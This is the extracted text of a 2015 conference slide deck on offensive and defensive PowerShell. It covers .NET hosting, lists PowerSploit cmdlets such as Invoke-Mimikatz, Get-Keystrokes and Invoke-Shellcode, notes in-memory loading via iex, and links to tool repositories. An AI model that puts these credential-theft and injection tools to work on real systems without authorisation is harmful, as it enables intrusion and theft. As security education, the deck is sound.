Date post: | 31-Jul-2015 |
Category: |
Technology |
Upload: | ben-ten-0xa |
View: | 1,245 times |
Download: | 1 times |
Gray Hat PowerShell
Ben Ten(@Ben0xA)
Slides: http://www.slideshare.net/BenTen0xA
ShowMeCon 2015
About Me
Ben Ten (0xA)@Ben0xA - twitter
Chicago - #burbsecSecurity Consultant at DeveloperPoshSec Framework CreatorGamerGeek
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Thank You!
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Thank You!
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
About Me
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
About Me
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
About This Talk
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
DISCLAIMER!
About This Talk
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
DISCLAIMER!Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec a diam lectus. Sed sit amet ipsum mauris. Maecenas congue ligula ac quam viverra nec consectetur ante hendrerit. Donec et mollis dolor. Praesent et diam eget libero egestas mattis sit amet vitae augue. Nam tincidunt congue enim, ut porta lorem lacinia consectetur. Donec ut libero sed arcu vehicula ultricies a non tortor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aenean ut gravida lorem. Ut turpis felis, pulvinar a semper sed, adipiscing id dolor. Pellentesque auctor nisi id magna consequat sagittis. Curabitur dapibus enim sit amet elit pharetra tincidunt feugiat nisl imperdiet. Ut convallis libero in urna ultrices accumsan. Donec sed odio eros. Donec viverra mi quis quam pulvinar at malesuada arcu rhoncus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. In rutrum accumsan ultricies. Mauris vitae nisi at sem facilisis semper ac in est.
Vivamus fermentum semper porta. Nunc diam velit, adipiscing ut tristique vitae, sagittis vel odio. Maecenas convallis ullamcorper ultricies. Curabitur ornare, ligula semper consectetur sagittis, nisi diam iaculis velit, id fringilla sem nunc vel mi. Nam dictum, odio nec pretium volutpat, arcu ante placerat erat, non tristique elit urna et turpis. Quisque mi metus, ornare sit amet fermentum et, tincidunt et orci. Fusce eget orci a orci congue vestibulum. Ut dolor diam, elementum et vestibulum eu, porttitor vel elit. Curabitur venenatis pulvinar tellus gravida ornare. Sed et erat faucibus nunc euismod ultricies ut id justo. Nullam cursus suscipit nisi, et ultrices justo sodales nec. Fusce venenatis facilisis lectus ac semper. Aliquam at massa ipsum. Quisque bibendum purus convallis nulla ultrices ultricies. Nullam aliquam, mi eu aliquam tincidunt, purus velit laoreet tortor, viverra pretium nisi quam vitae mi. Fusce vel volutpat elit. Nam sagittis nisi dui.
Yes, I know it's Lorem Ipsum….
About This Talk
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
DISCLAIMER!● Please do not use any of these tools, techniques, or code on any system that you do not own or otherwise have permission to use.
● Some of these things can damage systems!
About This Talk
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
This Talk is Not:
● An introduction to PowerShell
● Able to cover the wide array of techniques and code available in 45 minutes
About This Talk
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
About This Talk
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Practical PowerShell Programming for Professional People
http://ben0xa.com
-or-
https://youtube.com/watch?v=4X_uBL2YpmA
Overview
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
● Under the .NET Hood● Offense Tools● Defense Tools● Resources● Q&A● Hugs – if you want them!
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Before you create any tool, regardless of your intent, you need to understand what
you are building your tool upon.
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
PowerShell sits directly on Microsoft .NET Framework
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
PowerShell is NOT powershell.exe
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
powershell.exe is just a host application.
It hosts the assembly that contains PowerShell and handles I/O.
System.Management.Automation.dll
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Demo
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
The Code
$ps = [powershell]::Create()$ps.AddCommand("Get-ChildItem")$ps.Invoke()
$ps.Commands.Clear()$ps.AddScript("Write-Output `"Hey there ShowMeCon!`"; Get-ChildItem;")$ps.Invoke()
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Demo #2
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Under the .NET Framework Hood
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
The Code
The AwesomerShell code is available on ben0xa.com
Offense Tools
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
● PowerSploitMatt Graeber (@mattifestation)Chris Campbell (@obscuresec)
● Veil-PowerView / PowerUpWill Shroeder (@harmj0y)
● Posh-SecModCarlos Perez (@darkoperator)
Offense Tools
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
● PowerSploitMatt Graeber (@mattifestation)Chris Campbell (@obscuresec)
● Veil-PowerViewWill Shroeder (@harmj0y)
● Posh-SecModCarlos Perez (@darkoperator)
PowerSploit
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Add-PersistenceFind-4624LogonsFind-4648LogonsFind-AppLockerLogsFind-AVSignatureFind-PSScriptsInPSAppLogFind-RDPClientConnectionsGet-ComputerDetailsGet-GPPPasswordGet-HttpStatusGet-KeystrokesGet-SecurityPackagesGet-TimedScreenshotGet-VaultCredentialGet-VolumeShadowCopyInstall-SSPInvoke-CredentialInjectionInvoke-DllInjectionInvoke-MimikatzInvoke-NinjaCopy
Invoke-PortScanInvoke-ReflectivePEInjectionInvoke-ReverseDNSLookupInvoke-ShellcodeInvoke-ShellcodeMSILInvoke-TokenManipulationMount-VolumeShadowCopyNew-ElevatedPersistenceOptionNew-UserPersistenceOptionOut-CompressedDllOut-EncodedCommandOut-EncryptedScriptOut-MinidumpRemove-CommentsSet-CriticalProcessSet-MasterBootRecord
PowerSploit
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
STOP!
PowerSploit
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
PowerSploit
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
PowerSploit
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Invoke-Expression (iex)
Loads Directly in Memory – No Disk I/O
PowerSploit
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Demo #3
Defense Tools
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
● PoshSecMatt Johnson (@mwjcomputing)Ben Ten (@ben0xa)
● KansaDave Hull (@davehull)
● Invoke-IR / PowerForensicsJared Atkinson (@jaredcatkinson)
Defense Tools
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
● PoshSecMatt Johnson (@mwjcomputing)Ben Ten (@ben0xa)
● KansaDave Hull (@davehull)
● Invoke-IR / PowerForensicsJared Atkinson (@jaredcatkinson)
Defense Tools
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Demo #4
Defense Tools
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Defense Tools
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Defense Tools
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Resources
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
● PowerSploithttps://github.com/mattifestation/PowerSploit
● Veil-PowerView / PowerUphttps://github.com/veil-framework/
● Posh-SecModhttps://github.com/darkoperator/
Resources
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
● PoshSechttps://github.com/poshsec
● Kansahttps://github.com/davehull
● Invoke-IR / PowerForensicshttps://github.com/invoke-ir
Q&A
Gray Hat PowerShellShowMeCon 2015 - Ben Ten (@Ben0xA)
Ben Ten (0xA)@Ben0xA - twitterhttp://ben0xa.comhttp://[email protected] – LinkedIn, Github, keybase, etc.
irc.freenode.net#burbsec, #poshsec, #pssec
http://www.slideshare.net/BenTen0xA